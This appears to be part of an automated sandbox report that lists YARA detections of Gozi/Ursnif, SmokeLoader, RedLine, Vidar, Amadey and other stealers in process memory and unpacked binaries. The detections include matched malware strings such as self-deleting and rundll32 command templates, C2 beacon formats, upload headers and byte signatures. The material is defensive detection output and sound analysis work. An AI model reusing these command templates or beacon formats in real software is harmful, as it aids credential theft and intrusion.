00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xe50:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7b99:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x35df6:$pat14: , CommandLine: 0x24cbe:$v2_1: ListOfProcesses 0x23174:$v4_3: base64str 0x23133:$v4_4: stringKey 0x2317e:$v4_5: BytesToStringConverted 0x23169:$v4_6: FromBase64 0x2497b:$v4_8: procName 0x21d3c:$v5_1: DownloadAndExecuteUpdate 0x21d64:$v5_2: ITaskProcessor 0x21d2a:$v5_3: CommandLineUpdate 0x21d55:$v5_4: DownloadUpdate 0x21c9e:$v5_5: FileScanning 0x21f3c:$v5_7: RecordHeaderField 0x21e66:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
00000024.00000002.522046166.000000000127B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7b21:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6f64:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x10a0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GoStealer	Yara detected Go Stealer	Joe Security
Process Memory Space: B4A7.exe PID: 3080	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: rovwer.exe PID: 4852	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: E35A.exe PID: 4252	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: E35A.exe PID: 4252	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x62b:$a5: filename="%.4u.%lu" 0x929:$a5: filename="%.4u.%lu" 0x12170:$a5: filename="%.4u.%lu" 0x1246e:$a5: filename="%.4u.%lu" 0xf3:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x11c38:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x20:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x3e1:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x6e4:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x2648:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x266d:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x27f9:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xd997:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xdaef:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x11b65:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x11f26:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x12229:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xaaf:$a9: &whoami=%s 0x125f4:$a9: &whoami=%s 0xa97:$a10: %u.%u_%u_%u_x%u 0x125dc:$a10: %u.%u_%u_%u_x%u
Process Memory Space: E35A.exe PID: 4252	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x55a:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x85b:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1209f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x123a0:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xf3:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x29f:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x11c38:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x11de4:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5f7:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x8f5:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1213c:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1243a:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x48b:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x78f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x11fd0:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x122d4:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x6bb:$a9: Software\AppDataLow\Software\Microsoft\ 0x9c0:$a9: Software\AppDataLow\Software\Microsoft\ 0x16ef:$a9: Software\AppDataLow\Software\Microsoft\ 0x173d:$a9: Software\AppDataLow\Software\Microsoft\ 0x12200:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: EB2B.exe PID: 5512	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: EB2B.exe PID: 5628	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: F771.exe PID: 5640	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: F771.exe PID: 5640	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: explorer.exe PID: 5816	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: EB2B.exe PID: 5828	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: explorer.exe PID: 5876	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: RegSvcs.exe PID: 5128	JoeSecurity_GoStealer	Yara detected Go Stealer	Joe Security
Click to see the 97 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.3.cttgcew.870000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
32.3.F771.exe.9c6b90.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.3.F771.exe.9c6b90.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
13.3.B4A7.exe.716f68.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.716f68.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1f430:$pat14: , CommandLine: 0x17162:$v2_1: ListOfProcesses 0x16eed:$v4_3: base64str 0x17f81:$v4_4: stringKey 0x14b08:$v4_5: BytesToStringConverted 0x13b70:$v4_6: FromBase64 0x152dc:$v4_8: procName 0x1565f:$v5_1: DownloadAndExecuteUpdate 0x16dfd:$v5_2: ITaskProcessor 0x1564d:$v5_3: CommandLineUpdate 0x1563e:$v5_4: DownloadUpdate 0x15cf1:$v5_5: FileScanning 0x14e77:$v5_7: RecordHeaderField 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
13.3.B4A7.exe.716f68.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.716f68.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1f430:$pat14: , CommandLine: 0x17162:$v2_1: ListOfProcesses 0x16eed:$v4_3: base64str 0x17f81:$v4_4: stringKey 0x14b08:$v4_5: BytesToStringConverted 0x13b70:$v4_6: FromBase64 0x152dc:$v4_8: procName 0x1565f:$v5_1: DownloadAndExecuteUpdate 0x16dfd:$v5_2: ITaskProcessor 0x1564d:$v5_3: CommandLineUpdate 0x1563e:$v5_4: DownloadUpdate 0x15cf1:$v5_5: FileScanning 0x14e77:$v5_7: RecordHeaderField 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
13.3.B4A7.exe.d290000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.d290000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.q4Z52wRd28.exe.970000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
32.3.F771.exe.9c6b90.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.3.F771.exe.9c6b90.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.2.F771.exe.27a0ee8.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.27a0ee8.5.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
13.2.B4A7.exe.716f68.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.2.B4A7.exe.716f68.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.3.F771.exe.8c0000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.3.F771.exe.8c0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.q4Z52wRd28.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.3.B4A7.exe.d290000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.d290000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.2.F771.exe.880e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.880e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
32.2.F771.exe.27a0ee8.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
